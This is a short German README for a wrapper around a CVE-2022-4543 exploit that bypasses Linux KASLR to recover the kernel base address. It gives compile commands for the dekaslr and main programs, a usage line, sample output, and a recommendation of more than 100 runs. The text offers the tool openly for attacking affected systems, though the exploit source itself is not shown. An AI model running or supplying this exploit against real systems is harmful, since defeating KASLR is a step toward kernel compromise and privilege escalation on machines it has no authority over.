
Wrapper für den CVE-2022-4543 Exploit, der die Kernel-Basisadresse durch KASLR-Bypass entrandomisiert und so zuverlässige Kernel-Ausnutzung auf betroffenen Linux-Systemen ermöglicht.
Dies ist ein Wrapper des Exploits CVE-2022-4543 von willsroot, der Ihnen hilft, die Kernel-Basisadresse zu ermitteln.
Je nach Bedarf (optional):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
Bei manchen Betriebssystemen muss zuerst die statische libc installiert werden.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
Nachdem beide Programme ausgeführt wurden, wird die häufigste Adresse basierend auf Ihrem Offset angezeigt.
In der Praxis erscheint die echte Kernel-Basisadresse in mehr als 1/4 der Versuche. Empfehlung: mehr als 100 Versuche.